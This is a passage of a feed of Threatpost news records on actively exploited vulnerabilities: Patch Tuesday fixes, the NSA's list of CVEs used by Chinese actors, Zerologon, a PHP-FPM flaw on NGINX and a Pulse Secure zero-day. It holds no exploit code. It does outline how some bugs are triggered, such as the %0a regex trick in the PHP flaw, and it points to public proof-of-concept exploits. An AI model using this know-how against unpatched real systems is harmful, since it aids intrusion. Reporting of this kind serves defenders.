CVE-2019-19781 in English-speaking threat actor circles. And Turkish forums were focused on CVE-2019-6340.\n\nThe researchers add, for context, that about half of the monitored forums were Russian-speaking and that Spanish forums aren\u2019t mentioned because there wasn\u2019t a clear frontrunning CVE discussed.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {}, "published": "2021-07-16T21:07:15", "type": "threatpost", "title": "Top CVEs Trending with Cybercriminals", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0199", "CVE-2017-11882", "CVE-2019-0708", "CVE-2019-19781", "CVE-2019-6340", "CVE-2020-0688", "CVE-2020-0796", "CVE-2020-1472"], "modified": "2021-07-16T21:07:15", "id": "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "href": "https://threatpost.com/top-cves-trending-with-cybercriminals/167889/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-10T13:10:52", "description": "Microsoft has released its regularly scheduled March Patch Tuesday updates, which address 89 security vulnerabilities overall.\n\nIncluded in the slew are 14 critical flaws and 75 important-severity flaws. Microsoft also included five previously disclosed vulnerabilities, which are being actively exploited in the wild.\n\nFour of the actively exploited flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065), found [in Microsoft Exchange](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>), were disclosed as part of an emergency patch earlier this month by Microsoft; [businesses have been scrambling to patch their systems](<https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/>) as the bugs continue to be exploited in targeted attacks. The fifth actively-exploited flaw exists in the Internet Explorer and Microsoft Edge browsers ([CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>)). Proof-of-concept (PoC) exploit code also exists for this flaw, according to Microsoft.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cFor all of March, Microsoft released patches for 89 unique CVEs covering Microsoft Windows components, Azure and Azure DevOps, Azure Sphere, Internet Explorer and Edge (EdgeHTML), Exchange Server, Office and Office Services and Web Apps, SharePoint Server, Visual Studio, and Windows Hyper-V,\u201d said Dustin Childs with Trend Micro\u2019s Zero Day Initiative, [on Tuesday](<https://www.zerodayinitiative.com/blog/2021/3/9/the-march-2021-security-update-review>).\n\n## **Internet Explorer\u2019s Actively Exploited Flaw**\n\nThe memory-corruption flaw ([CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>)) in Internet Explorer and Microsoft Edge could enable remote code execution. Researchers said the flaw could allow an attacker to run code on affected systems, if victims view a specially crafted HTML file.\n\n\u201cWhile not as impactful as the Exchange bugs, enterprises that rely on Microsoft browsers should definitely roll this out quickly,\u201d said Childs. \u201cSuccessful exploitation would yield code execution at the level of the logged-on user, which is another reminder not to browse web pages using an account with administrative privileges.\u201d\n\nPoC exploit code is also publicly available for the issue. The bug is \u201ctied to a vulnerability\u201d that was [publicly disclosed in early February](<https://enki.co.kr/blog/2021/02/04/ie_0day.html>) by ENKI researchers. The researchers claimed it was one of the vulnerabilities used in a [concerted campaign by nation-state actors to target security researchers](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>), and they said they would publish PoC exploit code for the flaw after the bug has been patched.\n\n\u201cAs we\u2019ve seen in the past, once PoC details become publicly available, attackers quickly incorporate those PoCs into their attack toolkits,\u201d according to Satnam Narang, staff research engineer at Tenable. \u201cWe strongly encourage all organizations that rely on Internet Explorer and Microsoft Edge (EdgeHTML-Based) to apply these patches as soon as possible.\u201d\n\n## **PoC Exploit Code Available For Windows Privilege Elevation Flaw**\n\nIn addition to the five actively exploited vulnerabilities, Microsoft issued a patch for a vulnerability in Win32K for which public PoC exploit code is also available. This flaw [ranks important in severity](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27077>), and exists in Windows Win32K ([CVE-2021-27077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27077>)). A local attacker can exploit the flaw to gain elevated privileges, according to Microsoft. While PoC exploit code is available for the flaw, the tech giant said it has not been exploited in the wild, and that exploitation is \u201cless likely.\u201d\n\n## **Other Microsoft Critical Flaws**\n\n** **Microsoft patched 14 critical vulnerabilities overall in this month\u2019s Patch Tuesday updates, including ([CVE-2021-26897](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26897>)), which exists in Windows DNS server and can enable remote code execution. The flaw is one out of seven vulnerabilities in Windows DNS server; the other six are rated important severity. The critical-severity flaw can be exploited by an attacker with an existing foothold on the same network as the vulnerable device; the attack complexity for such an attack is \u201clow.\u201d\n\nA critical remote code-execution flaw also exists in Microsoft\u2019s Windows Hyper-V hardware virtualization product ([CVE-2021-26867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26867>)), which could allow an authenticated attacker to execute code on the underlying Hyper-V server.\n\n\u201cWhile listed as a CVSS of 9.9, the vulnerability is really only relevant to those using the Plan-9 file system,\u201d said Childs. \u201cMicrosoft does not list other Hyper-V clients as impacted by this bug, but if you are using Plan-9, definitely roll this patch out as soon as possible.\u201d\n\nAnother bug of note is a remote code-execution flaw existing on Microsoft\u2019s SharePoint Server ([CVE-2021-27076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27076>)). The flaw can be exploited by a remote attacker on the same network as the victim, and has a low attack complexity that makes exploitation more likely, according to Microsoft.\n\n\u201cFor an attack to succeed, the attacker must be able to create or modify sites with the SharePoint server,\u201d according to Childs. \u201cHowever, the default configuration of SharePoint allows authenticated users to create sites. When they do, the user will be the owner of this site and will have all the necessary permissions.\u201d\n\n## **Microsoft Exchange Updates: Patch Now**\n\nThe Microsoft Patch Tuesday updates come as businesses grapple with existing Microsoft Exchange zero-day vulnerabilities that were previously disclosed and continue to be used in active exploits. Overall, Microsoft had released out-of-band fixes for seven vulnerabilities \u2013 four of which were the actively-exploited flaws.\n\nOn Monday, the [European Banking Authority disclosed a cyberattack](<https://www.eba.europa.eu/cyber-attack-european-banking-authority-update-2>) that it said stemmed from an exploit of the Microsoft Exchange flaw. Beyond the European Banking Authority, one recent report said [that at least 30,000 organizations](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>) across the U.S. have been hacked by attackers exploiting the vulnerability.\n\n\u201cIf you run Exchange on-premise, you need to follow the published guidance and apply the patches as soon as possible,\u201d said Childs. \u201cMicrosoft has even taken the extraordinary step of creating patches for out-of-support versions of Exchange. Ignore these updates at your own peril.\u201d\n\nAlso released on Tuesday were Adobe\u2019s security updates, [addressing a cache of critical flaws](<https://threatpost.com/adobe-critical-flaws-windows/164611/>), which, if exploited, could allow for arbitrary code execution on vulnerable Windows systems.\n\n**_Check out our free _****_[upcoming live webinar events](<https://threatpost.com/category/webinars/>)_****_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_** \n\u00b7 March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>)) \n\u00b7 April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-09T22:12:56", "type": "threatpost", "title": "Microsoft Patch Tuesday Updates Fix 14 Critical Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26867", "CVE-2021-26897", "CVE-2021-27065", "CVE-2021-27076", "CVE-2021-27077"], "modified": "2021-03-09T22:12:56", "id": "THREATPOST:056C552B840B2C102A6A75A2087CA8A5", "href": "https://threatpost.com/microsoft-patch-tuesday-updates-critical-bugs/164621/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-22T15:51:14", "description": "Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities \u2013 with a Pulse VPN flaw claiming the dubious title of \u201cmost-favored bug\u201d for these groups.\n\nThat\u2019s according to the National Security Agency (NSA), which released a \u201ctop 25\u201d list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413,](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>) [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winniti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>).\n\nThe Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to patch amid this flurry of heightened activity.[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMany of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,\u201d warned the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). \u201cOnce a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.\u201d\n\nAPTs \u2013 Chinese and otherwise \u2013 have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the leadup to the U.S. elections next month. But Chlo\u00e9 Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities contribute to an ongoing swell of attacks.\n\n\u201cWe definitely saw an increase in this situation last year and it\u2019s ongoing,\u201d she said. \u201cThey\u2019re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies\u2026in other words, to steal and use for their own gain.\u201d\n\n## **Pulse Secure, BlueKeep, Zerologon and More**\n\nPlenty of well-known and infamous bugs made the NSA\u2019s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list.\n\nIt\u2019s an [arbitrary file-reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers. In April of this year, the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers are actively using the issue to steal passwords to infiltrate corporate networks. And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January.\n\nPulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven\u2019t applied it, CISA warned.\n\nAnother biggie for foreign adversaries is a critical flaw in F5 BIG-IP 8 proxy/load balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). This remote code-execution (RCE) bug exists in the Traffic Management User Interface (TMUI) of the device that\u2019s used for configuration. It allows complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serving as a hop-point into other areas of the network.\n\nAt the end of June, F5 issued urgent patches the bug, which has a CVSS severity score of 10 out of 10 \u201cdue to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July.\n\nThe NSA also flagged several vulnerabilities in Citrix as being Chinese faves, including CVE-2019-19781, which was revealed last holiday season. The bug exists in the Citrix Application Delivery Controller (ADC) and Gateway, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web. An exploit can lead to RCE without credentials.\n\nWhen it was originally disclosed in December, the vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \u2013 but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitations and mass scanning activity for the vulnerable Citrix products.\n\nOther Citrix bugs in the list include CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196.\n\nMeanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack a year after disclosure. The bug tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker connecting to the target system using RDP, to send specially crafted requests and execute code. The issue with BlueKeep is that researchers believe it to be wormable, which could lead to a WannaCry-level disaster, they have said.\n\nAnother bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks.\n\nThe very first bug ever reported to Microsoft by the NSA, CVE-2020-0601, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January,](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.\n\nTwo proof-of-concept (PoC) exploits were publicly released just a week after Microsoft\u2019s January Patch Tuesday security bulletin addressed the flaw.\n\nThen there\u2019s a high-profile Microsoft Exchange validation key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to properly create unique keys at install time.\n\nIt was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw.\n\n## **The Best of the Rest**\n\nThe NSA\u2019s Top 25 list covers plenty of ground, including a [nearly ubiquitous RCE bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all versions of Windows. It allows a man-in-the-middle attacker to bypass the NTLM Message Integrity Check protection.\n\nHere\u2019s a list of the other flaws:\n\n * CVE-2018-4939 in certain Adobe ColdFusion versions.\n * CVE-2020-2555 in the Oracle Coherence product in Oracle Fusion Middleware.\n * CVE-2019-3396 in the Widget Connector macro in Atlassian Confluence Server\n * CVE-2019-11580 in Atlassian Crowd or Crowd Data Center\n * CVE-2020-10189 in Zoho ManageEngine Desktop Central\n * CVE-2019-18935 in Progress Telerik UI for ASP.NET AJAX.\n * CVE-2019-0803 in Windows, a privilege-escalation issue in the Win32k component\n * CVE-2020-3118 in the Cisco Discovery Protocol implementation for Cisco IOS XR Software\n * CVE-2020-8515 in DrayTek Vigor devices\n\nThe advisory also covers three older bugs: One in Exim mail transfer (CVE-2018-6789); one in Symantec Messaging Gateway (CVE-2017-6327); and one in the WLS Security component in Oracle WebLogic Server (CVE-2015-4852).\n\n\u201cWe hear loud and clear that it can be hard to prioritize patching and mitigation efforts,\u201d NSA Cybersecurity Director Anne Neuberger said in a media statement. \u201cWe hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.\u201d\n", "cvss3": {}, "published": "2020-10-21T20:31:17", "type": "threatpost", "title": "Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-21T20:31:17", "id": "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "href": "https://threatpost.com/bug-nsa-china-backed-cyberattacks/160421/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:08:35", "description": "Microsoft is warning that an Iranian nation-state actor is now actively exploiting the Zerologon vulnerability (CVE-2020-1472), adding fuel to the fire as the severe flaw continues to plague businesses.\n\nThe [advanced persistent threat](<https://threatpost.com/iranian-apt-targets-govs-with-new-malware/153162/>) (APT) actor, which Microsoft calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm) has historically [targeted government victims](<https://threatpost.com/muddywater-apt-custom-tools/144193/>) in the Middle East to exfiltrate data. Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\n\u201cMSTIC has observed activity by the nation-state actor MERCURY using the CVE-2020-1472 exploit (Zerologon) in active campaigns over the last 2 weeks,\u201d according to a [Microsoft tweet on Monday evening](<https://twitter.com/MsftSecIntel/status/1313246337153077250>).\n\nMicrosoft released a patch for the Zerologon vulnerability ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)) as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). The bug is located in a core authentication component of Active Directory within the Windows Server OS and the Microsoft Windows Netlogon Remote Protocol (MS-NRPC). [As previous reported](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>), the flaw stems from the Netlogon Remote Protocol, available on Windows domain controllers, which is used for various tasks related to user and machine authentication.\n\n[Then, earlier in September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>) This spurred the Secretary of Homeland Security to issue a rare emergency directive, ordering federal agencies to patch their Windows Servers against the flaw by Sept. 21.\n\nMicrosoft\u2019s alert also comes [a week after Cisco Talos researchers warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n> MSTIC has observed activity by the nation-state actor MERCURY using the CVE-2020-1472 exploit (ZeroLogon) in active campaigns over the last 2 weeks. We strongly recommend patching. Microsoft 365 Defender customers can also refer to these detections: <https://t.co/ieBj2dox78>\n> \n> \u2014 Microsoft Security Intelligence (@MsftSecIntel) [October 5, 2020](<https://twitter.com/MsftSecIntel/status/1313246337153077250?ref_src=twsrc%5Etfw>)\n\nMicrosoft did not reveal further details of the MERCURY active exploitations in terms of victimology; however, a graph on its website shows that exploitation attempts (by attackers and red teams in general) started as early as Sept. 13 and have been ongoing ever since.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/06110502/1.png>)\n\nZerologon flaw attacker and red team activity. Credit: Microsoft\n\n\u201cOne of the adversaries noticed by our analysts was interesting because the attacker leveraged an older vulnerability for SharePoint (CVE-2019-0604) to exploit remotely unpatched servers (typically Windows Server 2008 and Windows Server 2012) and then implant a web shell to gain persistent access and code execution,\u201d said Microsoft [in an earlier analysis](<https://techcommunity.microsoft.com/t5/microsoft-365-defender/zerologon-is-now-detected-by-microsoft-defender-for-identity-cve/ba-p/1734034>). \u201cFollowing the web shell installation, this attacker quickly deployed a Cobalt Strike-based payload and immediately started exploring the network perimeter and targeting domain controllers found with the Zerologon exploit.\u201d\n\nMicrosoft for its part is addressing the vulnerability in a phased rollout. The initial deployment phase started with Windows updates being released on August 11, 2020, while the second phase, planned for the first quarter of 2021, will be an \u201cenforcement phase.\u201d\n\n**[On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n", "cvss3": {}, "published": "2020-10-06T15:51:12", "type": "threatpost", "title": "Microsoft Zerologon Flaw Under Attack By Iranian Nation-State Actors", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0604", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-10-06T15:51:12", "id": "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "href": "https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-06T21:57:01", "description": "A buffer underflow bug in PHP could allow remote code-execution (RCE) on targeted NGINX servers.\n\nFirst discovered during a hCorem Capture the Flag competition in September, the bug (CVE-2019-11043) exists in the FastCGI directive used in some PHP implementations on NGINX servers, according to researchers at Wallarm.\n\nPHP powers about 30 percent of modern websites, including popular web platforms like WordPress and Drupal \u2013 but NGINX servers are only vulnerable if they have PHP-FPM enabled (a non-default optimization feature that allows servers to execute scripts faster). The issue [is patched](<https://bugs.php.net/patch-display.php?bug_id=78599&patch=0001-Fix-bug-78599-env_path_info-underflow-can-lead-to-RC.patch&revision=latest>) in PHP versions 7.3.11, 7.2.24 and 7.1.33, which were released last week.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn a [Monday posting](<https://github.com/search?q=fastcgi_split_path&type=Code>), Wallarm researchers said that the bug can be exploited by sending specially crafted packets to the server by using the \u201cfastcgi_split_path\u201d directive in the NGINX configuration file. That file is configured to process user data, such as a URL. If an attacker creates a special URL that includes a \u201c%0a\u201d (newline) byte, the server will send back more data than it should, which confuses the FastCGI mechanism.\n\n\u201cIn particular, [the bug can be exploited] in a fastcgi_split_path directive and a regexp trick with newlines,\u201d according to Wallarm security researcher Andrew Danau, who found the bug. \u201cBecause of %0a character, NGINX will set an empty value to this variable, and fastcgi+PHP will not expect this\u2026.[as a result], it\u2019s possible to put [in] arbitrary FastCGI variables, like PHP_VALUE.\u201d\n\nAnother security researcher participating in the CTF exercise, Emil Lerner, offered more details in the [PHP bug tracker](<https://bugs.php.net/bug.php?id=78599>): \u201cThe regexp in `fastcgi_split_path_info` directive can be broken using the newline character (in encoded form, %0a). Broken regexp leads to empty PATH_INFO, which triggers the bug,\u201d he said.\n\nLerner [posted a zero-day proof-of-concept](<https://github.com/neex/phuip-fpizdam/>) exploit for the flaw that works in PHP 7 to allow code execution. The exploit makes use of an optimization used for storing FastCGI variables, _fcgi_data_seg.\n\n\u201cUsually, that sort of [buffer underflow] response is related to memory-corruption attacks and we expected to see an attack on the type of information disclosure,\u201d Wallarm researchers said. \u201cInformation disclosure is bad enough as it can result in leaking sensitive or financial data. Even worse, from time to time, although quite rarely, such behavior can indicate a remote code-execution vulnerability.\u201d\n\nResearchers added that without patching, this issue can be a dangerous entry point into web applications given the trivial nature of mounting an exploit.\n\nAdmins can identify vulnerable FastCGI directives in their NGINX configurations with a bash command, \u201cegrep -Rin \u2013color \u2018fastcgi_split_path\u2019 /etc/nginx/,\u201d according to Wallarm.\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "cvss3": {}, "published": "2019-10-28T16:18:11", "type": "threatpost", "title": "PHP Bug Allows Remote Code-Execution on NGINX Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11043", "CVE-2020-0688", "CVE-2020-1472"], "modified": "2019-10-28T16:18:11", "id": "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "href": "https://threatpost.com/php-bug-rce-nginx-servers/149593/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-21T15:44:32", "description": "A critical zero-day security vulnerability in Pulse Secure VPN devices has been exploited by nation-state actors to launch cyberattacks against U.S. defense, finance and government targets, as well as victims in Europe, researchers said.\n\n[](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)\n\nDownload \u201cThe Evolution of Ransomware\u201d to gain valuable insights on emerging trends amidst rapidly growing attack volumes. Click above to hone your defense intelligence!\n\nThe flaw, tracked as CVE-2021-22893, allows remote code-execution (RCE) and is being used in the wild to gain administrator-level access to the appliances, according to Ivanti research. Pulse Secure said that the zero-day will be patched in early May; but in the meantime, the company worked with Ivanti (its parent company) to release both mitigations and the [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/pkb_mobile#article/l:en_US/KB44755/s>), to help determine if systems have been impacted.\n\n\u201cThe investigation shows ongoing attempts to exploit four issues: The substantial bulk of these issues involve three vulnerabilities that were patched in 2019 and 2020: [Security Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) (CVE-2019-11510), [Security Advisory SA44588](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44588>) (CVE-2020-8243) and [Security Advisory SA44601](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601>) (CVE-2020-8260),\u201d according to a Pulse Secure statement provided to Threatpost. \u201cThe new issue, discovered this month, impacted a very limited number of customers.\u201d\n\n## **CVE-2021-22893: A Zero-Day in Pulse Connect Secure VPNs**\n\nThe newly discovered critical security hole is rated 10 out of 10 on the CVSS vulnerability-rating scale. It\u2019s an authentication bypass vulnerability that can allow an unauthenticated user to perform RCE on the Pulse Connect Secure gateway. It \u201cposes a significant risk to your deployment,\u201d according to the advisory, [issued Tuesday](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>).\n\n\u201cThe ongoing COVID-19 crisis resulted in an overnight shift to remote work culture, and VPNs played a critical role to make this possible,\u201d Bharat Jogi, senior manager of vulnerability and threat research at Qualys, said via email. \u201cVPNs have become a prime target for cybercriminals and over the past few months.\u201d\n\n\u201cThe Pulse Connect Secure vulnerability with CVE-2021-22893\u2026can be exploited without any user interaction,\u201d he added.\n\nThe mitigations involve importing a file called \u201cWorkaround-2104.xml,\u201d available on the advisory page. It disables the Windows File Share Browser and Pulse Secure Collaboration features on the appliance.\n\nUser can also use the blacklisting feature to disable URL-based attacks, the firm noted, by blocking the following URIs:\n\n * ^/+dana/+meeting\n * ^/+dana/+fb/+smb\n * ^/+dana-cached/+fb/+smb\n * ^/+dana-ws/+namedusers\n * ^/+dana-ws/+metric\n\n\u201cThe Pulse Connect Secure (PCS) team is in contact with a limited number of customers who have experienced evidence of exploit behavior on their PCS appliances,\u201d according to Pulse Secure. \u201cThe PCS team has provided remediation guidance to these customers directly.\u201d\n\nAccording to tandem research from Mandiant, this and the other bugs are at the center of a flurry of activity by different threat actors, involving 12 different malware families overall. The malware is used for authentication-bypass and establishing backdoor access to the VPN devices, and for lateral movement. Two specific advanced persistent threat (APT) groups, UNC2630 and UNC2717, are particularly involved, researchers said.\n\n## **UNC2630 Cyber-Activity: Links to China**\n\n\u201cWe observed UNC2630 harvesting credentials from various Pulse Secure VPN login flows, which ultimately allowed the actor to use legitimate account credentials to move laterally into the affected environments,\u201d according to Mandiant, in a [Tuesday posting](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>). \u201cIn order to maintain persistence to the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts on the VPN appliance.\u201d\n\nThe firm tracks those tools as the following:\n\n * **SlowPulse:** Trojanized shared objects with malicious code to log credentials and bypass authentication flows within the legitimate Pulse Secure shared object libdsplibs.so, including multifactor authentication requirements.\n * **RadialPulse and PulseCheck:** Web shells injected into legitimate, internet-accessible Pulse Secure VPN appliance administrative web pages.\n * **ThinBlood:** A utility used to clear relevant log files.\n * **Other capabilities:** Toggling the filesystem between Read-Only and Read-Write modes to allow for file modification on a typically Read-Only filesystem; the ability to maintain persistence across VPN appliance general upgrades that are performed by the administrator; and the ability to unpatch modified files and delete utilities and scripts after use to evade detection.\n\nUNC2630 targeted U.S. defense-sector companies as early as last August, Mandiant noted. It added that the activity could be state-sponsored, likely backed by China.\n\n\u201cWe suspect UNC2630 operates on behalf of the Chinese government and may have ties to APT5,\u201d according to the analysis. 